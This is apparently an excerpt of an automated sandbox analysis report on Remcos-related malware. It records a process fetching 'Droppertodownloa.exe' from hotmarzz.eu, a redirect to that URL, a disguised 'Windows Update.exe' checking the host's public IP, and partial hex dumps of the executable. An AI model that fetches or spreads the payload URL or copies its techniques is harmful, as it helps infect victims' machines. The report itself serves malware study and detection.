                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 74 6d 61 72 7a 7a 2e 65 75 2f 67 6f 6f 64 73 2f 44 72 6f 70 70 65 72 74 6f 64 6f 77 6e 6c 6f 61 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hotmarzz.eu/goods/Droppertodownloa.exe">here</a>.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.449769104.16.154.3680C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 7, 2021 13:40:13.525902987 CET5182OUTGET / HTTP/1.1
                                                                                              Host: whatismyipaddress.com
                                                                                              Connection: Keep-Alive
                                                                                              Dec 7, 2021 13:40:13.559828997 CET5183INHTTP/1.1 403 Forbidden
                                                                                              Date: Tue, 07 Dec 2021 12:40:13 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 16
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Referrer-Policy: same-origin
                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                              Set-Cookie: __cf_bm=ifc0FPkloiDp4Z1dpnjRqVqzqGMxVbTyrezZskC9KWs-1638880813-0-AXIdIT11xgQ5MMyVhDMcgQ9hAm7CPQjGNWgAvVdJNr0NNS/V7JbsqjReMXqFEa72rdjIhPL268dzLJd98EhxMqI=; path=/; expires=Tue, 07-Dec-21 13:10:13 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6b9dd23c9d0368fb-FRA
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                              Data Ascii: error code: 1020


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.44973981.88.52.165443C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-07 12:39:06 UTC0OUTGET /goods/Droppertodownloa.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Connection: Keep-Alive
                                                                                              Host: hotmarzz.eu
                                                                                              2021-12-07 12:39:06 UTC0INHTTP/1.1 200 OK
                                                                                              Date: Tue, 07 Dec 2021 12:39:06 GMT
                                                                                              Server: Apache
                                                                                              Upgrade: h2,h2c
                                                                                              Connection: Upgrade, close
                                                                                              Last-Modified: Mon, 06 Dec 2021 01:46:55 GMT
                                                                                              ETag: "1a05452-23e000-5d2706e852721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2351104
                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                              Content-Type: application/x-msdownload
                                                                                              2021-12-07 12:39:06 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c9 e1 07 db 8d 80 69 88 8d 80 69 88 8d 80 69 88 bb a6 64 88 8c 80 69 88 52 69 63 68 8d 80 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3e 88 99 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 00 00 00 c0 23 00 00 00 00 00 4c 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 01 00 04 00 00 00 00 00 00
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$iiidiRichiPEL>V#L @
                                                                                              2021-12-07 12:39:06 UTC8INData Raw: 00 80 0e 02 00 80 ea 1e 00 00 fc 1e 00 00 c7 02 00 80 12 1f 00 00 64 00 00 80 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 0b 00 44 6c 6c 46 75 6e 63 74 69 6f 6e 43 61 6c 6c 00 8e 00 5f 5f 76 62 61 45 78 63 65 70 74 48 61 6e 64 6c 65 72 00 00 2e 00 50 72 6f 63 43 61 6c 6c 45 6e 67 69 6e 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: dMSVBVM60.DLLDllFunctionCall__vbaExceptHandler.ProcCallEngine
                                                                                              2021-12-07 12:39:06 UTC16INData Raw: 00 00 eb 3a 8b 0d 70 eb 42 00 ff b4 81 94 00 00 00 57 e8 f7 30 00 00 eb 25 8b 0d d8 af 42 00 53 23 c8 51 6a 0b ff 75 cc ff 15 44 72 40 00 39 5d dc 74 0b 53 53 ff 75 cc ff 15 40 72 40 00 8b 45 fc 01 05 e8 eb 42 00 33 c0 5f 5e 5b c9 c2 04 00 88 28 40 00 90 14 40 00 9c 14 40 00 b7 14 40 00 ca 14 40 00 d6 14 40 00 f0 14 40 00 67 15 40 00 95 15 40 00 b3 15 40 00 34 16 40 00 fe 14 40 00 39 15 40 00 5a 15 40 00 45 16 40 00 96 16 40 00 fa 16 40 00 21 17 40 00 34 17 40 00 d8 18 40 00 db 18 40 00 0d 19 40 00 22 19 40 00 34 19 40 00 b5 19 40 00 e6 19 40 00 26 1a 40 00 58 1a 40 00 e5 1a 40 00 06 1b 40 00 ad 1b 40 00 ad 1b 40 00 6d 1c 40 00 8a 1c 40 00 a5 1c 40 00 c1 1c 40 00 1b 1d 40 00 95 1d 40 00 c1 1d 40 00 1b 1e 40 00 95 1e 40 00 c5 1e 40 00 50 1f 40 00 12 20 40
                                                                                              Data Ascii: :pBW0%BS#QjuDr@9]tSSu@r@EB3_^[(@@@@@@@g@@@4@@9@Z@E@@@!@4@@@@"@4@@@&@X@@@@@m@@@@@@@@@@P@ @
                                                                                              2021-12-07 12:39:06 UTC23INData Raw: 00 0f 8e c4 00 00 00 8b 45 e4 8d 50 08 89 55 ec 8d 42 10 80 38 00 0f 84 90 00 00 00 89 45 c8 8b 02 6a 20 8b d0 59 89 5d b0 23 d1 c7 45 b4 02 00 ff ff a8 02 c7 45 b8 0d 00 00 00 89 4d c4 89 7d dc 89 55 c0 74 38 8d 45 b0 c7 45 b8 4d 00 00 00 50 6a 00 68 00 11 00 00 c7 45 d8 01 00 00 00 ff 75 fc ff d6 8b 0d cc 9f 42 00 c7 45 e8 01 00 00 00 89 04 b9 a1 cc 9f 42 00 8b 1c b8 eb 2e a8 04 74 11 53 6a 03 68 0a 11 00 00 ff 75 fc ff d6 8b d8 eb 19 8d 45 b0 50 6a 00 68 00 11 00 00 ff 75 fc ff d6 8b 0d cc 9f 42 00 89 04 b9 8b 55 ec 47 81 c2 18 04 00 00 3b 3d 8c eb 42 00 89 55 ec 0f 8c 4b ff ff ff 83 7d e8 00 75 19 6a f0 ff 75 fc ff 15 90 71 40 00 24 fb 50 6a f0 ff 75 fc ff 15 30 72 40 00 83 7d f4 00 75 18 6a 05 ff 75 f8 ff 15 60 72 40 00 ff 75 f8 e8 96 f4 ff ff e9 83
                                                                                              Data Ascii: EPUB8Ej Y]#EEM}Ut8EEMPjhEuBEB.tSjhuEPjhuBUG;=BUK}ujuq@$Pju0r@}uju`r@u
                                                                                              2021-12-07 12:39:06 UTC31INData Raw: 8b c1 eb 05 8b 45 f8 2b c7 85 c0 0f 84 93 00 00 00 8a 4e 08 88 0f 47 48 89 7d d0 89 45 d4 e9 11 f8 ff ff 83 fb 07 76 09 83 eb 08 ff 45 cc ff 4d c8 8b 45 d0 ff 75 08 89 86 a8 9b 00 00 e8 b1 00 00 00 8b 8e a8 9b 00 00 8b 96 a4 9b 00 00 3b ca 89 4d d0 73 07 8b c2 2b c1 48 eb 08 8b 86 a0 9b 00 00 2b c1 3b ca 89 45 d4 75 39 8b 86 14 05 00 00 83 f8 08 89 06 75 33 8b 06 83 f8 0f 0f 86 32 f6 ff ff e9 93 f6 ff ff 8b 45 c0 33 ff 89 86 1c 05 00 00 8b 45 08 89 9e 18 05 00 00 89 78 04 e9 98 f6 ff ff 33 ff e9 79 f6 ff ff 33 ff 47 e9 71 f6 ff ff 6f 63 40 00 82 63 40 00 18 64 40 00 69 64 40 00 e7 64 40 00 2b 65 40 00 31 66 40 00 e2 66 40 00 9b 5d 40 00 30 5f 40 00 55 5f 40 00 63 60 40 00 a2 60 40 00 85 62 40 00 da 5d 40 00 f0 66 40 00 53 56 8b 74 24 0c 57 8b be b4 9b 00
                                                                                              Data Ascii: E+NGH}EvEMEu;Ms+H+;Eu9u32E3Ex3y3Gqoc@c@d@id@d@+e@1f@f@]@0_@U_@c`@`@b@]@f@SVt$W
                                                                                              2021-12-07 12:39:06 UTC39INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 00 03 00 00 10 73 03 00 28 08 01 00 00 00 00 00 00 00 00 00 38 7b 04 00 a8 94 00 00 00 00 00 00 00 00 00 00 e0 0f 05 00 88 54 00 00 00 00 00 00 00 00 00 00 68 64 05 00 28 42 00 00 00 00 00 00 00 00 00 00 90 a6 05 00 7b 2a 00 00 00 00 00 00 00 00 00 00 10 d1 05 00 a8 25 00 00 00 00 00 00 00 00 00 00 b8 f6 05 00 a8 10 00 00 00 00 00 00 00 00 00 00 60 07 06 00 88 09 00 00 00 00 00 00 00 00 00 00 e8 10 06 00 68 04 00 00 00 00 00 00 00 00 00 00 50 15 06 00 00 01 00 00 00 00 00 00 00 00 00 00 50 16 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 70 17 06 00 60 00 00 00 00 00 00 00 00 00 00 00 d0 17 06 00 84 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: s(8{Thd(B{*%`hPPp`
                                                                                              2021-12-07 12:39:06 UTC47INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 6b b7 01 3f 6b b6 b7 3f 6c b6 ff 40 71 c3 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 41 72 c6 ff 43 75 c8 ff 47 79 cc ff 4b 7c cf ff 4d 7f d1 ff 4e 80 d3 ff 4e 80 d3 ff 4e 80
                                                                                              Data Ascii: ?k?k?l@qArArArArArArArArArArArArArArArArArArArArArCuGyK|MNNN
                                                                                              2021-12-07 12:39:06 UTC55INData Raw: ff 4d 7e d1 ff 4d 7e d1 ff 4b 7c cf ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 47 78 cb ff 45 73 c1 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: M~M~K|GxGxGxGxGxGxGxGxGxGxGxGxGxGxEs
                                                                                              2021-12-07 12:39:06 UTC62INData Raw: ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4c 7e d0 ff 44 75 c9 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c8 ff 44 75 c9 ff 4c 7e d0 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f d1 ff 4d 7f
                                                                                              Data Ascii: MMMMMMMMMMML~DuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuDuL~MMMMMMMMMMMMMM
                                                                                              2021-12-07 12:39:06 UTC70INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 84 d6 2c 52 84 d7 e5 53 85 d7 ff 53 85 d7 ff 53 85 d7 ff 53 85 d7 ff 53 85 d7 ff 53 85 d7 ff 53 85 d7 ff 53 85 d7 ff 53 85
                                                                                              Data Ascii: R,RSSSSSSSSS
                                                                                              2021-12-07 12:39:06 UTC78INData Raw: ff 40 40 de ff 40 40 de ff 40 40 de ff 3f 3f dd ff 3f 3f dd ff 3e 3e dc ff 3d 3d db ff 3d 3d db ff 3e 3e dc ff 3e 3e dc ff 3e 3e dc ff 3e 3e dc ff 3f 3f dc ff 3f 3f dd ff 3f 3f dd ff 3f 3f dd ff 3f 3f dd ff 40 40 dd ff 40 40 de ff 40 40 de ff 40 40 de ff 40 40 de 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: @@@@@@????>>====>>>>>>>>??????????@@@@@@@@@@
                                                                                              2021-12-07 12:39:06 UTC86INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 4e eb 87 4e 4e eb ff 4d 4d eb ff 4d 4d ea ff 4d 4d ea ff 4c 4c ea ff 4c 4c e9 ff 4c 4c e9 ff 4b 4b e9 ff 4b 4b e8 ff 4a 4a e8 ff 4a 4a e7 ff 4a 4a e7 ff 49 49 e7 ff 49 49 e6 ff 49 49 e6 ff 48 48 e6 ff 48 48 e5 ff 47 47 e5 ff 47 47 e5 ff 47 47 e4 ff 46 46 e4 ff 46 46 e4 ff 46 46 e3 ff 45 45 e3 ff 45 45 e3 ff 45 45 e2 ff 44 44 e2 ff 44 44 e1 e1 43 43 e1 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 42 e0 88 43 43 e1 ff 43 43 e1 ff 43 43 e1 ff 44 44 e1 ff 44 44 e1 ff 44 44 e2 ff 44 44 e2 ff 45 45 e2 ff 45 45
                                                                                              Data Ascii: NNNNMMMMMMLLLLLLKKKKJJJJJJIIIIIIHHHHGGGGGGFFFFFFEEEEEEDDDDCCBBCCCCCCDDDDDDDDEEEE
                                                                                              2021-12-07 12:39:06 UTC94INData Raw: ff 4e 4e eb ff 4e 4e eb ff 4e 4e eb ff 4e 4e ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 50 50 ed ff 50 50 ed ff 50 50 ed ff 50 50 ed ff 50 50 ee ff 51 51 ee ff 51 51 ee f3 50 50 ee 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 53 f0 9f 53 53 f0 ff 53 53 f0 ff 52 52 ef ff 52 52 ef ff 51 51 ef ff 51 51 ee ff 51 51 ee ff 50 50 ee ff 50 50 ed ff 50 50 ed ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4e 4e eb ff 4e 4e eb ff 4d 4d eb ff 4d 4d ea ff 4d 4d
                                                                                              Data Ascii: NNNNNNNNOOOOOOOOPPPPPPPPPPQQQQPPSSSSSSRRRRQQQQQQPPPPPPOOOOOONNNNMMMMMM
                                                                                              2021-12-07 12:39:06 UTC102INData Raw: ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 4f 4f ec ff 50 50 ed ff 53 53 f0 ff 54 54 f1 ff 54 54 f1 ff 54 54 f1 ff 54 54 f1 ff 54 54 f1 ab 54 54 f1 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOPPSSTTTTTTTTTTTT
                                                                                              2021-12-07 12:39:06 UTC109INData Raw: fe 40 71 c5 fe 41 72 c5 ff 40 71 c5 fe 40 71 c5 fe 41 72 c5 ff 40 71 c5 fe 40 71 c5 fe 41 72 c5 ff 40 71 c5 fe 40 71 c5 fe 41 72 c5 ff 40 70 c2 fe 3f 6b b6 fe 3e 6b b6 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: @qAr@q@qAr@q@qAr@q@qAr@p?k>kl
                                                                                              2021-12-07 12:39:06 UTC117INData Raw: fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 46 77 cb ff 46 77 ca fe 46 77 ca fe 48 79 cd ff 4b 7c cf fe 4b 7c cf fe 4b 7d d0 ff 4b 7c cf fe 4b 7c cf fe 4b 7d d0 ff 4b 7c cf fe 4b 7c cf fe 4b 7d d0 ff 4b 7c cf fe 4b 7c cf ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: FwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwFwHyK|K|K}K|K|K}K|K|K}K|K|
                                                                                              2021-12-07 12:39:06 UTC125INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 62 de 29 4b 5b e0 f2 50 72 dc fe 55 84 da fe 56 88 da ff 55 87 d9 fe 55 87 d9 fe 56 88 da ff 55 87 d9 fe 55 87 d9 fe 56 88 da ff 55 87 d9 fe 55 87 d9 fe 56 88 da ff 55 87 d9 fe 55 87 d9 fe 56 88 da ff 55 87 d9 fe 55 87 d9 fe 53 80 da fe 4b 68 da ff 41 4b da fe 3c 3c da fe 3d 3e da da 40 49 da 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: Lb)K[PrUVUUVUUVUUVUUVUUSKhAK<<=>@I
                                                                                              2021-12-07 12:39:06 UTC133INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 4f ec 16 4f 4f ec d7 4e 4e eb fe 4e 4e ec ff 4d 4d eb fe 4d 4d ea fe 4d 4d ea ff 4c 4c e9 fe 4b 4b e9 fe 4b 4b e9 ff 4a 4a e8 fe 4a 4a e7 fe 4a 4a e7 ff 49 49 e6 fe 49 49 e6 ff 48 48 e5 fe 47 47 e5 fe 47 47 e5 ff 46 46 e4 fe 46 46 e3 fe 46 46 e4 ff 45 45 e2 fe 44 44 e2 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 44 e2 06 45 45 e2 be 45 45 e3 fe 45 45 e3 fe 46 46 e4 ff 46 46 e3 fe 46 46 e4 fe 47 47 e4 ff 47 47 e4 fe 47 47 e5 fe 48 48 e5 ff 48 48 e5 fe 48 48 e5 fe 49 49 e6 ff 49 49 e6 fe 49 49
                                                                                              Data Ascii: OOOONNNNMMMMMMLLKKKKJJJJJJIIIIHHGGGGFFFFFFEEDDDDEEEEEEFFFFFFGGGGGGHHHHHHIIIIII
                                                                                              2021-12-07 12:39:06 UTC141INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 4f ec 39 4e 4e eb e7 4e 4e ec ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50 ed fe 51 51 ee ff 50 50 ed fe 50 50
                                                                                              Data Ascii: OO9NNNNPPPPQQPPPPQQPPPPQQPPQQPPPPQQPPPPQQPPPPQQPPPPQQPPPPQQPPPPQQPPPPQQPPPP
